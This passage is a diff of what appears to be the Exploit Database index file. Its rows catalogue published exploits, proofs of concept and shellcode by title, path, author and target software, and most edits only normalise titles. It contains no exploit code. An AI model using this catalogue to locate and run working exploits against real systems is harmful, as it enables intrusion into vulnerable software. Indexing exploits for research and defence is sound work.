10069,platforms/php/webapps/10069.php,"Empire CMS 47 SQL Injection",2009-10-05,"Securitylab Security Research",php,webapps,0 10070,platforms/windows/remote/10070.php,"IBM Informix Client SDK 3.0 nfx file integer Overflow Exploit",2009-10-05,bruiser,windows,remote,0 10071,platforms/multiple/remote/10071.txt,"Mozilla NSS - NULL Character CA SSL Certificate Validation Security Bypass",2009-11-10,"Dan Kaminsky",multiple,remote,0 @@ -9602,9 +9602,9 @@ id,file,description,date,author,platform,type,port 10314,platforms/php/webapps/10314.txt,"BM Classifieds Ads SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10318,platforms/php/webapps/10318.txt,"Joomla yt_color YOOOtheme XSS and Cookie Stealing",2009-12-04,andresg888,php,webapps,80 10319,platforms/windows/local/10319.py,"IDEAL Administration 2009 9.7 - Local Buffer Overflow Exploit",2009-12-05,Dr_IDE,windows,local,0 -10320,platforms/windows/local/10320.py,"M3U To ASX-WPL 1.1 - (m3u Playlist file) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 -10321,platforms/windows/local/10321.py,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 -10322,platforms/windows/local/10322.py,"Audacity 1.2.6 - (gro File) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 +10320,platforms/windows/local/10320.py,"M3U To ASX-WPL 1.1 - (.m3u) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 +10321,platforms/windows/local/10321.py,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 +10322,platforms/windows/local/10322.py,"Audacity 1.2.6 - (.gro) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 - (hhp) Buffer Overflow Exploit (Universal)",2009-12-05,Dz_attacker,windows,local,0 10324,platforms/php/webapps/10324.txt,"phpshop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps,0 10325,platforms/php/webapps/10325.txt,"WordPress Image Manager Plugins - Shell Upload",2009-12-05,DigitALL,php,webapps,0 @@ -9616,7 +9616,7 @@ id,file,description,date,author,platform,type,port 10332,platforms/windows/local/10332.rb,"IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit)",2009-12-06,dookie,windows,local,0 10333,platforms/windows/dos/10333.py,"VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC",2009-12-06,Dr_IDE,windows,dos,0 10334,platforms/multiple/dos/10334.py,"VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux)",2009-12-06,Dr_IDE,multiple,dos,0 -10335,platforms/windows/local/10335.rb,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (Metasploit)",2009-12-07,loneferret,windows,local,0 +10335,platforms/windows/local/10335.rb,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (Metasploit)",2009-12-07,loneferret,windows,local,0 10337,platforms/php/webapps/10337.txt,"Chipmunk Newsletter Persistant XSS",2009-12-07,mr_me,php,webapps,0 10338,platforms/linux/dos/10338.pl,"Polipo 1.0.4 - Remote Memory Corruption PoC (0Day)",2009-12-07,"Jeremy Brown",linux,dos,0 10339,platforms/windows/local/10339.pl,"gAlan 0.2.1 - Buffer Overflow Exploit (0Day)",2009-12-07,"Jeremy Brown",windows,local,0 @@ -9664,7 +9664,7 @@ id,file,description,date,author,platform,type,port 10389,platforms/php/webapps/10389.txt,"Illogator Shop SQL Injection Bypass",2009-12-11,bi0,php,webapps,0 10390,platforms/php/webapps/10390.txt,"phpCollegeExchange 0.1.5c Multiple SQL Injection Vulnerabilities",2009-12-11,"Salvatore Fresta",php,webapps,0 10391,platforms/php/webapps/10391.txt,"XAMPP 1.7.2 Change Administrative Password",2009-12-11,bi0,php,webapps,0 -10392,platforms/windows/local/10392.rb,"Millenium MP3 Studio 2.0 - (PLS File) Universal Stack Overflow (Metasploit)",2009-12-11,dookie,windows,local,0 +10392,platforms/windows/local/10392.rb,"Millenium MP3 Studio 2.0 - (.pls) Universal Stack Overflow (Metasploit)",2009-12-11,dookie,windows,local,0 10393,platforms/php/webapps/10393.txt,"B2C Booking Centre Systems SQL Injection",2009-12-11,"Salvatore Fresta",php,webapps,0 10394,platforms/windows/remote/10394.py,"HP NNM 7.53 ovalarm.exe CGI Pre Authentication Remote Buffer Overflow",2009-12-12,"sinn3r and muts",windows,remote,80 14948,platforms/php/webapps/14948.txt,"festos CMS 2.3b - Multiple Vulnerabilities",2010-09-09,Abysssec,php,webapps,0 @@ -9961,7 +9961,7 @@ id,file,description,date,author,platform,type,port 10744,platforms/windows/local/10744.rb,"Media Jukebox 8.0.400 - (seh) Buffer Overflow Exploit (Metasploit)",2009-12-27,dijital1,windows,local,0 10745,platforms/windows/local/10745.c,"Mini-stream Ripper 3.0.1.1 - (.pls) Local Universal Buffer Overflow Exploit",2009-12-27,mr_me,windows,local,0 10747,platforms/windows/local/10747.py,"Mini-Stream - (Windows XP SP2 and SP3) Exploit",2009-12-27,dijital1,windows,local,0 -10748,platforms/windows/local/10748.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (1)",2009-12-27,dijital1,windows,local,0 +10748,platforms/windows/local/10748.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (Metasploit) (1)",2009-12-27,dijital1,windows,local,0 10750,platforms/php/webapps/10750.txt,"Mambo Component Material Suche 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0 10751,platforms/php/webapps/10751.txt,"Koobi Pro 6.1 - Gallery (img_id)",2009-12-27,BILGE_KAGAN,php,webapps,0 10752,platforms/multiple/webapps/10752.txt,"Yonja Remote File Upload",2009-12-28,indoushka,multiple,webapps,80 @@ -10203,7 +10203,7 @@ id,file,description,date,author,platform,type,port 11104,platforms/php/webapps/11104.txt,"CMScontrol 7.x File Upload",2010-01-11,Cyber_945,php,webapps,0 11106,platforms/multiple/dos/11106.bat,"Nuked KLan <= 1.7.7 & <= SP4 DoS",2010-01-11,"Hamza 'MIzoZ' N",multiple,dos,0 11107,platforms/php/webapps/11107.txt,"gridcc script 1.0 - (SQL/XSS) Multiple Vulnerabilities",2010-01-11,Red-D3v1L,php,webapps,0 -11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - (PLS File) Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0 +11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - (.pls) Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0 11110,platforms/php/webapps/11110.txt,"Image Hosting Script Remote shell upload",2010-01-11,R3d-D3V!L,php,webapps,0 11111,platforms/php/webapps/11111.txt,"FAQEngine 4.24.00 - Remote File Inclusion",2010-01-11,kaMtiEz,php,webapps,0 11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 - Local .html Buffer Overflow (Win32) Exploit",2010-01-11,"fl0 fl0w",windows,local,0 @@ -10269,7 +10269,7 @@ id,file,description,date,author,platform,type,port 11189,platforms/php/webapps/11189.txt,"Soft Direct 1.05 - Multiple Vulnerabilities",2010-01-18,indoushka,php,webapps,0 11190,platforms/windows/dos/11190.txt,"AOL 9.5 - ActiveX Heap Overflow",2010-01-19,"Hellcode Research",windows,dos,0 11191,platforms/windows/local/11191.pl,"Millenium MP3 Studio 1.x - (.m3u) Local Stack Overflow",2010-01-19,NeoCortex,windows,local,0 -11192,platforms/windows/dos/11192.txt,"OpenOffice - (.slk File) Parsing Null Pointer",2010-01-19,"Hellcode Research",windows,dos,0 +11192,platforms/windows/dos/11192.txt,"OpenOffice - (.slk) Parsing Null Pointer",2010-01-19,"Hellcode Research",windows,dos,0 11195,platforms/windows/dos/11195.html,"Microsoft Windows Defender ActiveX Heap Overflow PoC",2010-01-19,SarBoT511,windows,dos,0 11196,platforms/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow PoC",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0 11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 - (.smi) Local Buffer Overflow PoC",2010-01-19,d3b4g,windows,dos,0 @@ -10785,7 +10785,7 @@ id,file,description,date,author,platform,type,port 11791,platforms/windows/local/11791.pl,"myMP3-Player 3.0 - (.m3u) Local Buffer Overflow Exploit (SEH)",2010-03-18,n3w7u,windows,local,0 11792,platforms/multiple/dos/11792.pl,"mplayer <= 4.4.1 NULL pointer dereference Exploit PoC",2010-03-18,"Pietro Oliva",multiple,dos,0 11793,platforms/jsp/webapps/11793.txt,"ManageEngine ServiceDesk Plus 7.6 - woID SQL Injection",2010-03-18,"Nahuel Grisolia",jsp,webapps,0 -11794,platforms/windows/local/11794.c,"MediaCoder - (.lst file) Local Buffer Overflow Exploit",2010-03-18,"fl0 fl0w",windows,local,0 +11794,platforms/windows/local/11794.c,"MediaCoder - (.lst) Local Buffer Overflow Exploit",2010-03-18,"fl0 fl0w",windows,local,0 11795,platforms/php/webapps/11795.txt,"DewNewPHPLinks 2.1.0.1 - LFI",2010-03-18,ITSecTeam,php,webapps,0 11797,platforms/windows/local/11797.py,"ZippHo 3.0.6 - (.zip) Stack Buffer Overflow PoC Exploit (0Day)",2010-03-18,mr_me,windows,local,0 11799,platforms/php/webapps/11799.txt,"SiteDone Custom Edition 2.0 - SQL Injection & XSS",2010-03-18,d3v1l,php,webapps,0 @@ -12115,7 +12115,7 @@ id,file,description,date,author,platform,type,port 13751,platforms/php/webapps/13751.txt,"greeting card Remote Upload",2010-06-06,Mr.Benladen,php,webapps,0 13752,platforms/php/webapps/13752.txt,"reVou Twitter Clone 2.0 Beta - SQL Injection and XSS",2010-06-06,Sid3^effects,php,webapps,0 13754,platforms/multiple/webapps/13754.txt,"JForum 2.1.8 bookmarks CSRF & XSS",2010-06-07,"Adam Baldwin",multiple,webapps,0 -13756,platforms/windows/local/13756.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit (DEP bypass)",2010-06-07,mr_me,windows,local,0 +13756,platforms/windows/local/13756.py,"VUPlayer 2.49 - (.m3u) Universal Buffer Overflow Exploit (DEP bypass)",2010-06-07,mr_me,windows,local,0 13760,platforms/windows/local/13760.py,"Audio Converter 8.1 - Stack Buffer Overflow PoC Exploit (0Day)",2010-06-07,sud0,windows,local,0 13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 - SEH Buffer Overflow",2010-06-07,chap0,windows,local,0 13762,platforms/php/webapps/13762.txt,"CommonSense CMS SQL Injection",2010-06-07,Pokeng,php,webapps,0 @@ -12603,7 +12603,7 @@ id,file,description,date,author,platform,type,port 14350,platforms/php/webapps/14350.txt,"Joomla Component QContacts (com_qcontacts) - SQL Injection",2010-07-13,_mlk_,php,webapps,0 14349,platforms/windows/dos/14349.html,"Opera - Denial of Service by canvas Element",2010-07-12,"Pouya Daneshmand",windows,dos,0 14351,platforms/php/webapps/14351.txt,"I-net Enquiry Management Script SQL Injection",2010-07-13,D4rk357,php,webapps,0 -14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS DEP and ASLR Bypass)",2010-07-13,Node,windows,local,0 +14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS DEP and ASLR Bypass) (Metasploit)",2010-07-13,Node,windows,local,0 14353,platforms/php/webapps/14353.html,"Diferior CMS 8.03 - Multiple CSRF Vulnerabilities",2010-07-13,10n1z3d,php,webapps,0 14354,platforms/php/webapps/14354.txt,"AJ Article Persistent XSS",2010-07-13,Sid3^effects,php,webapps,0 14356,platforms/php/webapps/14356.txt,"CustomCMS Persistent XSS",2010-07-13,Sid3^effects,php,webapps,0 @@ -12699,7 +12699,7 @@ id,file,description,date,author,platform,type,port 14461,platforms/asp/webapps/14461.txt,"AKY Blog SQL Injection",2010-07-24,v0calist,asp,webapps,0 14462,platforms/php/webapps/14462.txt,"Joomla Ozio Gallery Component (com_oziogallery) SQL Injection",2010-07-24,"ViRuS Qalaa",php,webapps,0 14463,platforms/php/webapps/14463.txt,"Joomla ITArmory Component (com_itarmory) SQL Injection",2010-07-24,Craw,php,webapps,0 -14464,platforms/windows/local/14464.pl,"Mediacoder 0.7.3.4682 - (.m3u File) Universal Buffer Overflow Exploit",2010-07-24,s-dz,windows,local,0 +14464,platforms/windows/local/14464.pl,"Mediacoder 0.7.3.4682 - (.m3u) Universal Buffer Overflow Exploit",2010-07-24,s-dz,windows,local,0 14465,platforms/php/webapps/14465.txt,"sNews 1.7 - (index.php?category) SQL Injection",2010-07-24,CoBRa_21,php,webapps,0 14466,platforms/php/webapps/14466.txt,"Joomla Component (com_joomdle) 0.24 - SQL Injection",2010-07-24,kaMtiEz,php,webapps,0 14467,platforms/php/webapps/14467.txt,"Joomla Component (com_youtube) SQL Injection",2010-07-24,Forza-Dz,php,webapps,0 @@ -12740,7 +12740,7 @@ id,file,description,date,author,platform,type,port 14518,platforms/php/webapps/14518.txt,"Joomla Component Spielothek 1.6.9 - Multiple Blind SQL Injection",2010-07-31,"Salvatore Fresta",php,webapps,0 14519,platforms/windows/remote/14519.html,"Barcodewiz 3.29 - Barcode ActiveX Control Remote Heap Spray Exploit (IE6/IE7)",2010-07-31,Dr_IDE,windows,remote,0 14521,platforms/hardware/webapps/14521.txt,"Intellinet IP Camera MNC-L10 - Authentication Bypass",2010-08-01,Magnefikko,hardware,webapps,0 -14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass",2010-08-01,"Ben Schmidt",windows,remote,0 +14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass (Metasploit)",2010-08-01,"Ben Schmidt",windows,remote,0 14523,platforms/php/webapps/14523.txt,"SnoGrafx (cat.php?cat) SQL Injection",2010-08-02,CoBRa_21,php,webapps,0 14528,platforms/php/webapps/14528.txt,"APT-WEBSHOP-SYSTEM modules.php SQL Injection",2010-08-02,secret,php,webapps,0 14530,platforms/php/webapps/14530.txt,"Joomla CamelcityDB 2.2 - SQL Injection",2010-08-02,Amine_92,php,webapps,0 @@ -13132,7 +13132,7 @@ id,file,description,date,author,platform,type,port 15070,platforms/php/webapps/15070.txt,"ibPhotohost 1.1.2 - SQL Injection",2010-09-21,fred777,php,webapps,0 15071,platforms/windows/remote/15071.txt,"Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - (SoftekATL.dll) Buffer Overflow PoC",2010-09-21,LiquidWorm,windows,remote,0 15072,platforms/windows/remote/15072.rb,"Novell iPrint Client ActiveX Control call-back-url Buffer Overflow Exploit (Metasploit)",2010-09-21,Trancer,windows,remote,0 -15073,platforms/windows/remote/15073.rb,"Novell iPrint Client ActiveX Control 'debug' Buffer Overflow Exploit",2010-09-21,Trancer,windows,remote,0 +15073,platforms/windows/remote/15073.rb,"Novell iPrint Client ActiveX Control 'debug' Buffer Overflow Exploit (Metasploit)",2010-09-21,Trancer,windows,remote,0 15074,platforms/linux/local/15074.sh,"mountall <= 2.15.2 (Ubuntu 10.04/10.10) - Local Privilege Escalation",2010-09-21,fuzz,linux,local,0 15075,platforms/php/webapps/15075.txt,"wpQuiz 2.7 - Authentication Bypass",2010-09-21,KnocKout,php,webapps,0 15076,platforms/windows/dos/15076.py,"Adobe Shockwave Director tSAC - Chunk Memory Corruption",2010-09-22,Abysssec,windows,dos,0 @@ -14417,7 +14417,7 @@ id,file,description,date,author,platform,type,port 16614,platforms/windows/local/16614.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (1)",2010-09-20,Metasploit,windows,local,0 16615,platforms/windows/local/16615.rb,"Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption",2010-04-30,Metasploit,windows,local,0 16616,platforms/windows/remote/16616.rb,"SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16617,platforms/windows/local/16617.rb,"VUPlayer - M3U Buffer Overflow",2010-11-11,Metasploit,windows,local,0 +16617,platforms/windows/local/16617.rb,"VUPlayer - (.m3u) Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16618,platforms/windows/local/16618.rb,"BlazeDVD 5.1 - PLF Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16619,platforms/windows/local/16619.rb,"Adobe CoolType SING Table 'uniqueName' Stack Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 16620,platforms/windows/local/16620.rb,"Media Jukebox 8.0.400 - Buffer Overflow Exploit (SEH)",2011-01-08,Metasploit,windows,local,0 @@ -14426,17 +14426,17 @@ id,file,description,date,author,platform,type,port 16623,platforms/windows/local/16623.rb,"Adobe - Doc.media.newPlayer Use After Free (2)",2010-09-25,Metasploit,windows,local,0 16624,platforms/windows/local/16624.rb,"Adobe util.printf() Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 16625,platforms/windows/local/16625.rb,"Microsoft Excel Malformed FEATHEADER Record",2010-09-25,Metasploit,windows,local,0 -16626,platforms/windows/local/16626.rb,"Audiotran 1.4.1 - (PLS File) Stack Buffer Overflow",2010-01-28,Metasploit,windows,local,0 +16626,platforms/windows/local/16626.rb,"Audiotran 1.4.1 - (.pls) Stack Buffer Overflow",2010-01-28,Metasploit,windows,local,0 16627,platforms/windows/local/16627.rb,"UltraISO CUE File Parsing Buffer Overflow",2010-04-30,Metasploit,windows,local,0 16628,platforms/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16629,platforms/windows/local/16629.rb,"VideoLAN VLC TiVo Buffer Overflow",2011-02-02,Metasploit,windows,local,0 16630,platforms/windows/remote/16630.rb,"CA eTrust PestPatrol ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 -16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (1)",2010-09-25,Metasploit,windows,local,0 +16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (1)",2010-09-25,Metasploit,windows,local,0 16632,platforms/windows/local/16632.rb,"ACDSee - XPM File Section Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16634,platforms/windows/local/16634.rb,"Free Download Manager Torrent Parsing Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16635,platforms/windows/remote/16635.rb,"activePDF WebGrabber ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 -16636,platforms/windows/local/16636.rb,"Millenium MP3 Studio 2.0 - (PLS File) Stack Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16636,platforms/windows/local/16636.rb,"Millenium MP3 Studio 2.0 - (.pls) Stack Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16637,platforms/windows/local/16637.rb,"VideoLAN VLC MKV Memory Corruption",2011-02-08,Metasploit,windows,local,0 16638,platforms/windows/remote/16638.rb,"DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow",2010-09-25,Metasploit,windows,remote,0 16639,platforms/windows/remote/16639.rb,"McAfee Remediation Client ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 @@ -14444,21 +14444,21 @@ id,file,description,date,author,platform,type,port 16641,platforms/windows/remote/16641.rb,"SasCam Webcam Server 2.6.5 - Get() method Buffer Overflow",2010-09-25,Metasploit,windows,remote,0 16642,platforms/windows/local/16642.rb,"WM Downloader 3.1.2.2 - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16643,platforms/windows/local/16643.rb,"SafeNet SoftRemote GROUPNAME Buffer Overflow",2010-11-11,Metasploit,windows,local,0 -16644,platforms/windows/local/16644.rb,"VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow",2010-04-05,Metasploit,windows,local,0 +16644,platforms/windows/local/16644.rb,"VariCAD 2010-2.05 EN - (.DWB) Stack Buffer Overflow",2010-04-05,Metasploit,windows,local,0 16645,platforms/windows/local/16645.rb,"URSoft W32Dasm Disassembler Function Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16646,platforms/windows/local/16646.rb,"HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow",2010-04-30,Metasploit,windows,local,0 16647,platforms/windows/remote/16647.rb,"EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 -16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (2)",2010-09-25,Metasploit,windows,local,0 +16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (2)",2010-09-25,Metasploit,windows,local,0 16649,platforms/windows/remote/16649.rb,"Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit",2010-09-25,Metasploit,windows,remote,0 16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - (.xpl) universal Local Buffer Overflow Exploit (SEH) (2)",2010-09-25,Metasploit,windows,local,0 16651,platforms/windows/local/16651.rb,"AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16652,platforms/windows/local/16652.rb,"Adobe FlateDecode Stream Predictor 02 Integer Overflow (2)",2010-09-25,Metasploit,windows,local,0 16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow",2010-12-16,Metasploit,windows,local,0 16654,platforms/windows/local/16654.rb,"Orbital Viewer - ORB File Parsing Buffer Overflow",2010-03-09,Metasploit,windows,local,0 -16655,platforms/windows/local/16655.rb,"ProShow Gold 4.0.2549 - (PSH File) Stack Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16655,platforms/windows/local/16655.rb,"ProShow Gold 4.0.2549 - (.PSH) Stack Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16656,platforms/windows/local/16656.rb,"Altap Salamander 2.5 PE Viewer Buffer Overflow",2010-12-16,Metasploit,windows,local,0 16657,platforms/aix/dos/16657.rb,"PointDev IDEAL Migration - Buffer Overflow",2010-09-25,Metasploit,aix,dos,0 -16658,platforms/windows/local/16658.rb,"VUPlayer - CUE Buffer Overflow",2010-11-11,Metasploit,windows,local,0 +16658,platforms/windows/local/16658.rb,"VUPlayer - (.cue) Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16659,platforms/aix/local/16659.rb,"Cain & Abel <= 4.9.24 - RDP Buffer Overflow",2010-11-24,Metasploit,aix,local,0 16660,platforms/windows/local/16660.rb,"Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow",2011-02-08,Metasploit,windows,local,0 16661,platforms/windows/local/16661.rb,"Audio Workstation 6.4.2.4.3 - pls Buffer Overflow",2010-09-25,Metasploit,windows,local,0 @@ -14475,7 +14475,7 @@ id,file,description,date,author,platform,type,port 16672,platforms/windows/local/16672.rb,"Adobe - JBIG2Decode Memory Corruption Exploit (2)",2010-09-25,Metasploit,windows,local,0 16673,platforms/windows/local/16673.rb,"Digital Music Pad 8.2.3.3.4 - Stack Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16674,platforms/windows/local/16674.rb,"Adobe Collab.collectEmailInfo() Buffer Overflow",2010-09-25,Metasploit,windows,local,0 -16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner (DBR File) Path Buffer Overflow",2010-09-20,Metasploit,windows,local,0 +16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner - (.DBR) Path Buffer Overflow",2010-09-20,Metasploit,windows,local,0 16676,platforms/windows/local/16676.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (2)",2011-01-08,Metasploit,windows,local,0 16677,platforms/windows/local/16677.rb,"CA Antivirus Engine CAB Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16678,platforms/windows/local/16678.rb,"VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow",2010-09-20,Metasploit,windows,local,0 @@ -14483,12 +14483,12 @@ id,file,description,date,author,platform,type,port 16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic VBP Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16681,platforms/windows/local/16681.rb,"Adobe Collab.getIcon() Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 16682,platforms/windows/local/16682.rb,"Adobe PDF Escape EXE Social Engineering (No JavaScript)",2010-12-16,Metasploit,windows,local,0 -16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (3)",2010-09-25,Metasploit,windows,local,0 +16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (3)",2010-09-25,Metasploit,windows,local,0 16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .M3U Buffer Overflow",2010-04-30,Metasploit,windows,local,0 16685,platforms/windows/remote/16685.rb,"MOXA MediaDBPlayback ActiveX Control Buffer Overflow",2010-11-05,Metasploit,windows,remote,0 16686,platforms/windows/local/16686.rb,"Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)",2011-03-04,Metasploit,windows,local,0 16687,platforms/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (2)",2010-09-25,Metasploit,windows,local,0 -16688,platforms/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - (PLS File) Stack Buffer Overflow",2010-11-24,Metasploit,windows,local,0 +16688,platforms/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - (.pls) Stack Buffer Overflow",2010-11-24,Metasploit,windows,local,0 16689,platforms/windows/remote/16689.rb,"CCProxy <= 6.2 - Telnet Proxy Ping Overflow",2010-04-30,Metasploit,windows,remote,23 16690,platforms/windows/remote/16690.rb,"Qbik WinGate WWW Proxy Server URL Processing Overflow",2010-09-20,Metasploit,windows,remote,80 16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy Host Header Overflow",2010-07-12,Metasploit,windows,remote,80 @@ -14922,7 +14922,7 @@ id,file,description,date,author,platform,type,port 17141,platforms/php/webapps/17141.txt,"Point Market System 3.1x vbulletin plugin SQLi",2011-04-10,Net.Edit0r,php,webapps,0 17142,platforms/windows/dos/17142.py,"IrfanView 4.28 - ICO With Transparent Colour DoS & RDoS",2011-04-10,BraniX,windows,dos,0 17143,platforms/windows/dos/17143.py,"IrfanView 4.28 - ICO Without Transparent Colour DoS & RDoS",2011-04-10,BraniX,windows,dos,0 -17144,platforms/windows/local/17144.pl,"MikeyZip 1.1 - (.zip File) Buffer Overflow",2011-04-10,"C4SS!0 G0M3S",windows,local,0 +17144,platforms/windows/local/17144.pl,"MikeyZip 1.1 - (.zip) Buffer Overflow",2011-04-10,"C4SS!0 G0M3S",windows,local,0 17146,platforms/php/webapps/17146.txt,"K-Links - Link Directory Script SQL Injection",2011-04-11,R3d-D3V!L,php,webapps,0 17147,platforms/linux/local/17147.txt,"tmux 1.3/1.4 - '-S' Option Incorrect SetGID Privilege Escalation",2011-04-11,ph0x90bic,linux,local,0 17148,platforms/multiple/remote/17148.rb,"Zend Server Java Bridge Arbitrary Java Code Execution",2011-04-05,Metasploit,multiple,remote,10001 @@ -15063,10 +15063,10 @@ id,file,description,date,author,platform,type,port 20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - ASLR deactivation shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 17324,platforms/php/webapps/17324.rb,"AWStats Totals <= 1.14 multisort - Remote Command Execution",2011-05-25,Metasploit,php,webapps,0 17325,platforms/php/webapps/17325.py,"Clipbucket 2.4 RC2 645 SQL Injection",2011-05-26,"AutoSec Tools",php,webapps,0 -17326,platforms/windows/shellcode/17326.rb,"Windows - DNS Reverse Download and Exec Shellcode",2011-05-26,"Alexey Sintsov",windows,shellcode,0 +17326,platforms/windows/shellcode/17326.rb,"Windows - DNS Reverse Download and Exec Shellcode (Metasploit)",2011-05-26,"Alexey Sintsov",windows,shellcode,0 17327,platforms/php/webapps/17327.txt,"HB Ecommerce - SQL Injection",2011-05-27,takeshix,php,webapps,0 17328,platforms/windows/remote/17328.html,"Magneto ICMP ActiveX 4.0.0.20 - ICMPSendEchoRequest Remote Code Execute",2011-05-27,boahat,windows,remote,0 -17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 - (.mmm) Stack Buffer Overflow (without egg-hunter)",2011-05-27,"Alexey Sintsov",windows,local,0 +17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 - (.mmm) Stack Buffer Overflow (without egg-hunter) (Metasploit)",2011-05-27,"Alexey Sintsov",windows,local,0 17330,platforms/php/webapps/17330.html,"cPanel < 11.25 - CSRF Add User php Script",2011-05-27,ninjashell,php,webapps,0 17335,platforms/php/webapps/17335.txt,"Duhok Forum 1.1 - SQL Injection",2011-05-28,M.Jock3R,php,webapps,0 17336,platforms/php/webapps/17336.txt,"Guru Penny Auction Pro 3.0 - Blind SQL Injection",2011-05-28,v3n0m,php,webapps,0 @@ -15137,10 +15137,10 @@ id,file,description,date,author,platform,type,port 17412,platforms/php/webapps/17412.txt,"Joomla Component (com_team) SQL Injection",2011-06-19,CoBRa_21,php,webapps,0 17413,platforms/php/webapps/17413.txt,"Burning Board 3.1.5 Full Path Disclosure",2011-06-19,linc0ln.dll,php,webapps,0 17414,platforms/php/webapps/17414.txt,"Joomla Component Calc Builder (id) Blind SQL 